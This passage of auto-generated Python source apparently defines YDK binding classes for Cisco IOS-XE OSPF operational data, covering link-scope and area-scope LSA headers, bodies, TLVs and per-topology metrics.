                                """OSPFv3 intra-area prefix entry: YANG list 'ospfv3-ia-prefix' keyed by prefix."""
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    """Initialize ydk metadata, the prefix list key, and the options leaf."""
                                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, self).__init__()
                                    self.yang_name = "ospfv3-ia-prefix"
                                    self.yang_parent_name = "link-scope-lsa"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = ['prefix']
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
                                        ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
                                    ])
                                    self.prefix = None
                                    self.prefix_options = None
                                    self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    """Route writes through ydk so YLeaf values are updated in place."""
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)
                            class MultiTopology(Entity):
                                """Multi-topology identifier: YANG list 'multi-topology' keyed by name."""
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    """Initialize ydk metadata and the name list key (the only leaf)."""
                                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology, self).__init__()
                                    self.yang_name = "multi-topology"
                                    self.yang_parent_name = "link-scope-lsa"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = ['name']
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('name', (YLeaf(YType.str, 'name'), ['str'])),
                                    ])
                                    self.name = None
                                    self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    """Route writes through ydk so the YLeaf value is updated in place."""
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology, ['name'], name, value)
                            class Tlv(Entity):
                                """Traffic-engineering link TLV: YANG container 'tlv' under 'link-scope-lsa'."""
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    """Initialize ydk metadata and the TE link attribute leaves (bandwidths are Decimal64)."""
                                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv, self).__init__()
                                    self.yang_name = "tlv"
                                    self.yang_parent_name = "link-scope-lsa"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])),
                                        ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
                                        ('local_if_ipv4_addr', (YLeafList(YType.str, 'local-if-ipv4-addr'), ['str','str'])),
                                        ('local_remote_ipv4_addr', (YLeafList(YType.str, 'local-remote-ipv4-addr'), ['str','str'])),
                                        ('te_metric', (YLeaf(YType.uint32, 'te-metric'), ['int'])),
                                        ('max_bandwidth', (YLeaf(YType.str, 'max-bandwidth'), ['Decimal64'])),
                                        ('max_reservable_bandwidth', (YLeaf(YType.str, 'max-reservable-bandwidth'), ['Decimal64'])),
                                        ('unreserved_bandwidth', (YLeaf(YType.str, 'unreserved-bandwidth'), ['Decimal64'])),
                                        ('admin_group', (YLeaf(YType.uint32, 'admin-group'), ['int'])),
                                    ])
                                    self.link_type = None
                                    self.link_id = None
                                    # leaf-lists: local and remote interface IPv4 addresses.
                                    self.local_if_ipv4_addr = []
                                    self.local_remote_ipv4_addr = []
                                    self.te_metric = None
                                    self.max_bandwidth = None
                                    self.max_reservable_bandwidth = None
                                    self.unreserved_bandwidth = None
                                    self.admin_group = None
                                    self._segment_path = lambda: "tlv"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    """Route writes through ydk so YLeaf/YLeafList values are updated in place."""
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv, ['link_type', 'link_id', 'local_if_ipv4_addr', 'local_remote_ipv4_addr', 'te_metric', 'max_bandwidth', 'max_reservable_bandwidth', 'unreserved_bandwidth', 'admin_group'], name, value)
                            class UnknownSubTlv(Entity):
                                """Unparsed sub-TLV: YANG list 'unknown-sub-tlv' keyed by type."""
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    """Initialize ydk metadata, the type list key, and the raw-byte value list."""
                                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv, self).__init__()
                                    self.yang_name = "unknown-sub-tlv"
                                    self.yang_parent_name = "link-scope-lsa"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = ['type']
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                                        ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                                        ('value', (YLeafList(YType.uint8, 'value'), ['int'])),
                                    ])
                                    self.type = None
                                    self.length = None
                                    # leaf-list of uint8: the sub-TLV payload as raw octets.
                                    self.value = []
                                    self._segment_path = lambda: "unknown-sub-tlv" + "[type='" + str(self.type) + "']"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    """Route writes through ydk so YLeaf/YLeafList values are updated in place."""
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv, ['type', 'length', 'value'], name, value)
class AreaScopeLsa(Entity):
    """
    Area-scope LSA list entry (YANG list 'area-scope-lsa' under
    'intf-link-scope-lsas'), keyed by ('lsa-type', 'adv-router').
    Carries the raw LSA bytes plus decoded OSPFv2/OSPFv3 child
    containers and lists; the nested binding classes are defined
    further down in this class body.
    Auto-generated ydk binding; instances are frozen after __init__.
    """
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'
    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa, self).__init__()
        self.yang_name = "area-scope-lsa"
        self.yang_parent_name = "intf-link-scope-lsas"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['lsa_type','adv_router']
        # YANG child name -> (python attribute, binding class)
        self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix))])
        self._leafs = OrderedDict([
            ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
            ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
            ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
            ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
            ])
        self.lsa_type = None
        self.adv_router = None
        self.decoded_completed = None
        self.raw_data = []
        # Singleton child containers are instantiated eagerly and parented here.
        self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa()
        self.ospfv2_lsa.parent = self
        self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"
        self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa()
        self.ospfv3_lsa.parent = self
        self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa"
        # Child YANG lists start empty.
        self.ospfv2_link = YList(self)
        self.ospfv2_topology = YList(self)
        self.ospfv2_external = YList(self)
        self.ospfv3_link = YList(self)
        self.ospfv3_prefix = YList(self)
        self.ospfv3_ia_prefix = YList(self)
        # Both list keys are embedded in the path predicates.
        self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']"
        self._is_frozen = True
    def __setattr__(self, name, value):
        # Only the listed leaf names remain settable on a frozen instance.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value)
    class Ospfv2Lsa(Entity):
        """
        Decoded OSPFv2 LSA (YANG container 'ospfv2-lsa' under
        'area-scope-lsa'): exposes 'header' and 'lsa-body' child
        containers, no leafs of its own.
        Auto-generated ydk binding; instances are frozen after __init__.
        """
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'
        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, self).__init__()
            self.yang_name = "ospfv2-lsa"
            self.yang_parent_name = "area-scope-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody))])
            self._leafs = OrderedDict()
            self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header()
            self.header.parent = self
            self._children_name_map["header"] = "header"
            self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody()
            self.lsa_body.parent = self
            self._children_name_map["lsa_body"] = "lsa-body"
            self._segment_path = lambda: "ospfv2-lsa"
            self._is_frozen = True
        def __setattr__(self, name, value):
            # No settable leafs: the empty whitelist rejects leaf writes.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, [], name, value)
        class Header(Entity):
            """OSPFv2 LSA header leafs: id, opaque type/id, age, type, adv-router, seq-num, checksum, length and flag options."""
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'
            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, self).__init__()
                self.yang_name = "header"
                self.yang_parent_name = "ospfv2-lsa"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
                    ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
                    ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
                    ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                    ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                    ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                    ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                    ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                    ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                    ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
                    ])
                self.lsa_id = None
                self.opaque_type = None
                self.opaque_id = None
                self.age = None
                self.type = None
                self.adv_router = None
                self.seq_num = None
                self.checksum = None
                self.length = None
                self.flag_options = Bits()
                self._segment_path = lambda: "header"
                self._is_frozen = True
            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)
        class LsaBody(Entity):
            """OSPFv2 LSA body: link count, summary/external masks, body flags and the 'network' child container."""
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'
            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, self).__init__()
                self.yang_name = "lsa-body"
                self.yang_parent_name = "ospfv2-lsa"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network))])
                self._leafs = OrderedDict([
                    ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
                    ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
                    ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
                    ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
                    ])
                self.num_of_links = None
                self.summary_mask = None
                self.external_mask = None
                self.body_flag_options = Bits()
                self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network()
                self.network.parent = self
                self._children_name_map["network"] = "network"
                self._segment_path = lambda: "lsa-body"
                self._is_frozen = True
            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)
            class Network(Entity):
                """Network-LSA data: network mask plus the list of attached routers."""
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'
                def __init__(self):
                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__()
                    self.yang_name = "network"
                    self.yang_parent_name = "lsa-body"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([])
                    self._leafs = OrderedDict([
                        ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
                        ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
                        ])
                    self.network_mask = None
                    self.attached_router = []
                    self._segment_path = lambda: "network"
                    self._is_frozen = True
                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
    class Ospfv2Link(Entity):
        """
        Router-LSA link entry (YANG list 'ospfv2-link' under
        'area-scope-lsa'), keyed by ('link-id', 'link-data'), with a
        per-topology metric child list.
        Auto-generated ydk binding; instances are frozen after __init__.
        """
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'
        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link, self).__init__()
            self.yang_name = "ospfv2-link"
            self.yang_parent_name = "area-scope-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = ['link_id','link_data']
            self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology))])
            self._leafs = OrderedDict([
                ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
                ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
                ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
                ])
            self.link_id = None
            self.link_data = None
            self.type = None
            self.ospfv2_topology = YList(self)
            # Both list keys are embedded in the path predicates.
            self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
            self._is_frozen = True
        def __setattr__(self, name, value):
            # Only the listed leaf names remain settable on a frozen instance.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)
        class Ospfv2Topology(Entity):
            """Per-topology metric for this link, keyed by 'mt-id'."""
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'
            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__()
                self.yang_name = "ospfv2-topology"
                self.yang_parent_name = "ospfv2-link"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = ['mt_id']
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                    ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
                    ])
                self.mt_id = None
                self.metric = None
                self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
                self._is_frozen = True
            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
    class Ospfv2Topology(Entity):
        """
        Per-topology metric attached directly to the area-scope LSA
        (YANG list 'ospfv2-topology' under 'area-scope-lsa', keyed by
        'mt-id'). Distinct from the same-named class nested in
        Ospfv2Link, whose parent is 'ospfv2-link'.
        Auto-generated ydk binding; instances are frozen after __init__.
        """
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'
        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology, self).__init__()
            self.yang_name = "ospfv2-topology"
            self.yang_parent_name = "area-scope-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = ['mt_id']
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
                ])
            self.mt_id = None
            self.metric = None
            self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
            self._is_frozen = True
        def __setattr__(self, name, value):
            # Only the listed leaf names remain settable on a frozen instance.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value)
    class Ospfv2External(Entity):
        """
        External-LSA data (YANG list 'ospfv2-external' under
        'area-scope-lsa', keyed by 'mt-id'): metric, forwarding address
        and external route tag.
        Auto-generated ydk binding; instances are frozen after __init__.
        """
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'
        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External, self).__init__()
            self.yang_name = "ospfv2-external"
            self.yang_parent_name = "area-scope-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = ['mt_id']
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
                ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
                ])
            self.mt_id = None
            self.metric = None
            self.forwarding_address = None
            self.external_route_tag = None
            self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
            self._is_frozen = True
        def __setattr__(self, name, value):
            # Only the listed leaf names remain settable on a frozen instance.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
    class Ospfv3Lsa(Entity):
        """
        Decoded OSPFv3 LSA (YANG container 'ospfv3-lsa' under
        'area-scope-lsa'): exposes 'header' and 'lsa-body' child
        containers, no leafs of its own.
        Auto-generated ydk binding; instances are frozen after __init__.
        """
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'
        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, self).__init__()
            self.yang_name = "ospfv3-lsa"
            self.yang_parent_name = "area-scope-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody))])
            self._leafs = OrderedDict()
            self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header()
            self.header.parent = self
            self._children_name_map["header"] = "header"
            self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody()
            self.lsa_body.parent = self
            self._children_name_map["lsa_body"] = "lsa-body"
            self._segment_path = lambda: "ospfv3-lsa"
            self._is_frozen = True
        def __setattr__(self, name, value):
            # No settable leafs: the empty whitelist rejects leaf writes.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, [], name, value)
        class Header(Entity):
            """OSPFv3 LSA header wrapper: LSA id, header option bits and the common 'lsa-header' child container."""
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'
            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, self).__init__()
                self.yang_name = "header"
                self.yang_parent_name = "ospfv3-lsa"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader))])
                self._leafs = OrderedDict([
                    ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
                    ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
                    ])
                self.lsa_id = None
                self.lsa_hdr_options = Bits()
                self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader()
                self.lsa_header.parent = self
                self._children_name_map["lsa_header"] = "lsa-header"
                self._segment_path = lambda: "header"
                self._is_frozen = True
            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value)
            class LsaHeader(Entity):
                """Common LSA header leafs: age, type, adv-router, seq-num, checksum, length."""
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'
                def __init__(self):
                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, self).__init__()
                    self.yang_name = "lsa-header"
                    self.yang_parent_name = "header"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([])
                    self._leafs = OrderedDict([
                        ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                        ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                        ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                        ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                        ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                        ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                        ])
                    self.age = None
                    self.type = None
                    self.adv_router = None
                    self.seq_num = None
                    self.checksum = None
                    self.length = None
                    self._segment_path = lambda: "lsa-header"
                    self._is_frozen = True
                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
        class LsaBody(Entity):
            """OSPFv3 LSA body: flag/option bits plus one child container per decoded body variant (network, prefix, ia-router, lsa-external, nssa, link-data, ia-prefix)."""
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'
            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, self).__init__()
                self.yang_name = "lsa-body"
                self.yang_parent_name = "ospfv3-lsa"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix))])
                self._leafs = OrderedDict([
                    ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
                    ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
                    ])
                self.lsa_flag_options = Bits()
                self.lsa_body_flags = Bits()
                # Each body variant container is instantiated eagerly and parented here.
                self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network()
                self.network.parent = self
                self._children_name_map["network"] = "network"
                self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix()
                self.prefix.parent = self
                self._children_name_map["prefix"] = "prefix"
                self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter()
                self.ia_router.parent = self
